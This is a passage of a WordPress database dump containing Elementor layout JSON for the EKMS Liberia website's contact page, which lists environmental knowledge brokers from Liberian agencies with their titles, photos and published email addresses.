:\"39e22a6\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7b606ac\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/edward.png\",\"id\":3334}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"29ef7d1\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"17eb719\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/bgoll.jpg\",\"id\":3426}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ddce9f1\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"f5bca22\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a080131\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<strong>Konikay Nimely<\\/strong>\\n<p>EIA Manager <\\/br>FDA <\\/br>\\n<a href=\\\"mailto:kondema79@gmail.com\\\">kondema79@gmail.com<\\/a>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"79bfd85\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6a85176\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Edward S. Kamara<\\/strong><br \\/>Marketing and Forest Forecast<br \\/>FDA<br \\/><a href=\\\"mailto:kamara.ed14@gmail.com\\\">kamara.ed14@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b372794\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"89187ea\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Blamah Goll<\\/strong><br \\/>Conservation Manager<br \\/>FDA<br \\/><a href=\\\"mailto:blamahg@gmail.com\\\">blamahg@gmail.com<\\/a><br \\/><a href=\\\"mailto:blamahg@yahoo.com\\\">blamahg@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"d3e03bf\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"4d885f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"32bbf7d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/francis-2.png\",\"id\":3340}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0137c53\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"058ac29\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"781a85f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/Uriah.png\",\"id\":3347}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"4c547ba\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2b0ae9e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"62420a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Francis W. Mwah<\\/strong><br \\/>Director <br \\/>MOA <br \\/><a href=\\\"mailto:fwmwah1958@yahoo.com\\\">fwmwah1958@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"33fc46f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9feecd9\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>John Willabo Johnson <\\/strong><br \\/>Assistant Minister<br \\/>MME<br \\/><a href=\\\"mailto:john.willabo@yahoo.com\\\">john.willabo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"34117d3\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"fe7894a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Uriah Garsinii <\\/strong><br \\/>Land Use Management Manager<br \\/>LLA<br \\/><a href=\\\"mailto:ugarsinii@yahoo.com\\\">ugarsinii@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"25d00af\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"fc5ff06\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9564f30\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/mr-wesseh.png\",\"id\":3367},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"20138ff\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"cd79b29\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/WIN_20160609_11_17_46_Pro.jpg\",\"id\":3160},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"d1e4641\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b7fd678\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/AlFreeman.jpg\",\"id\":3183},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"519145f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"8314024\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"9c38029\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Aaron S.M. Wesseh<\\/strong><br \\/>Manager<br \\/>Cross-Cutting Capacity Development Project<br \\/>EPA<br \\/><a href=\\\"mailto:bethelapril90@gmail.com\\\">bethelapril90@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0cfcbe5\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"865743e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Jesse Mathies<\\/strong><br \\/>Assistant Director<br \\/>Division of Foreign Trade<br \\/>MOCI<br \\/><a href=\\\"mailto:jesmathies@gmail.com\\\">jesmathies@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"98255ed\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"0322201\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Alphonso Freeman<\\/strong><br \\/>Biosafety Officer<br \\/>National Standard Laboratory<br \\/>MOCI<br \\/><a href=\\\"mailto:freemanalphonso29@yahoo.com\\\">freemanalphonso29@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"2ea0ab9\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c682593\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"dc24385\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"5ae9515\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2020\\/10\\/1.jpg\",\"id\":3165},\"image_size\":\"custom\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"dbcd9dd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f37529a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/golafale.png\",\"id\":3351}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"992774f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"77967dc\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"ae8e0aa\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"2763f7b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"435cd31\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Lasana M. Donzo<\\/strong><br \\/>Coordinator for Standards<br \\/>MOCI<br \\/>Bureau of Industrial Services<br \\/><a href=\\\"mailto:lasanadonzo@yahoo.com\\\">lasanadonzo@yahoo.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"0a4b126\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f7ea9a8\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Mambu Golafale<\\/strong><br \\/>Senior Research Officer<br \\/>MOCI<br \\/>Division of Knowledge Management &amp; Archive<br \\/><a href=\\\"mailto:mgolafale1@gmail.com\\\">mgolafale1@gmail.com<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"b3d1f48\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a9ecf24\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Ahmed Sheriff <\\/strong><br \\/>Director<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"738e0dd\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"6e7b3da\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"e8bed5f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d1d7c9e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/yokie.png\",\"id\":3355}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"918d54e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"94412fe\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea090e8\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/kumeh.png\",\"id\":3360}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"74f915b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"e88acc7\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"d32c806\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f40392e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Anthony Yokie<\\/strong><br \\/>Manager<br \\/>NaFAA<br \\/>Department of Marine Fisheries and Environment<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"23fe33d\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"ea61b10\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Tonia Boah <\\/strong><br \\/>Monitoring, Control, and Surveillance Field Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"27d77d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"d2a5e3d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Joyce Kumeh<\\/strong><br \\/>Small Scale Fisheries Officer<br \\/>NaFAA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"1f03dc8\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"33e80f1\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"5c25b8f\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"b10d67e\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/lavalah.png\",\"id\":3364}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"b4a2e51\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"e3dd1e8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"ad72733\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"707d444\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"23520fd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"a3814ef\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Atty. Stephen B. Lavalah <\\/strong><br \\/>Associate Director<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"18738fa\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"6765846\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Nadine Ajamia<\\/strong><br \\/>Policy Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"bd520e9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"7bc5a8c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Henry Y. Kesselly<\\/strong><br \\/>Senior Research Officer<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e860d0b\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"f6d0ce0\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"6b97206\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"76384d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c4dcbf8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false},{\"id\":\"9d55206\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"8c09b65\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"a0b7d70\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"87f3106\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Konah Kaliku<\\/strong><br \\/>Environmental Inspector<br \\/>Department of Marine Environmental Protection<br \\/>LIMA<\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"ea624a8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false},{\"id\":\"c8f36c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(23939,3505,'_elementor_edit_mode','builder'),(23940,3505,'_elementor_template_type','wp-page'),(23941,3505,'_elementor_version','3.0.16'),(23942,3505,'_wp_page_template','default'),(23943,3505,'_elementor_data','[{\"id\":\"3ded694\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"44216f4\"}]},\"elements\":[{\"id\":\"5d3ff64\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"0ba37a2\",\"elType\":\"widget\",\"settings\":{\"title\":\"Contact Us\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":30,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0d9a870\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"0f9b854\"}]},\"elements\":[{\"id\":\"645d44c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b86d64\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Please contact the EKMS Team for further information relating to this website.<br>\\nSend an e-mail to our <a href=\\\"maito:contact@ekmsliberia.info\\\">Helpdesk<\\/a> or fill out the contact form below:<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"align\":\"center\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"94083b6\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"494ae8d\"}]},\"elements\":[{\"id\":\"2544493\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"space_between_widgets\":-23},\"elements\":[{\"id\":\"92e0be0\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"ca88780\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[everest_form id=\\\"2889\\\"]\",\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"30\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e119157\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"3bb9b2b\"}]},\"elements\":[{\"id\":\"5726a77\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"98c4065\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":51,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"c0885e6\",\"elType\":\"widget\",\"settings\":{\"title\":\"EKMS Knowledge Brokers\",\"align\":\"center\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"500\",\"header_size\":\"h1\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"907c188\",\"elType\":\"widget\",\"settings\":{\"editor\":\"Contact  our knowledge brokers for direct support or response to your questions:\",\"align\":\"center\",\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"206586f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"7f54ab8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"f399fed\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_DC.jpg\",\"id\":2313},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/j-s-datuama-cammue\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"45dc831\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"97ee966\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2019\\/11\\/knowledge_broker_BK.jpg\",\"id\":2359},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/benjamin-karmorh\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\",\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"4d5438e\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"18b04be\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/wp-content\\/uploads\\/2021\\/01\\/jallah.png\",\"id\":3371},\"image_size\":\"custom\",\"image_custom_dimension\":{\"width\":\"700\",\"height\":\"652\"},\"caption_source\":\"custom\",\"link_to\":\"custom\",\"link\":{\"url\":\"https:\\/\\/ekmsliberia.info\\/knowledge-broker\\/berexford-s-jallah\\/\",\"is_external\":\"on\",\"nofollow\":\"\"},\"text_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7695f0f\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"c0d893e\"}],\"structure\":\"30\"},\"elements\":[{\"id\":\"c329034\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"93bee82\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>J.S. Datuama Cammue<\\/strong><br \\/>MEAs Officer<br \\/>UNCBD Focal Point<br \\/>EPA<br \\/><a href=\\\"&quot;mailto:jcammue@epa.gov.lr\\\">jcammue@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"05d0b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"821b474\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Benjamin Karmorh<\\/strong><br \\/>MEAs Coordinator<br \\/>UNFCCC Focal Point<br \\/>EPA<br \\/><a>bkarmorh@epa.gov.lr<\\/a><\\/p>\",\"align\":\"center\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2f49cdd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"77354cc\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p><strong>Berexford S. Jallah<\\/strong><br \\/>GIS Coordinator<br \\/>UNCCD Focal Point<br \\/>EPA<br 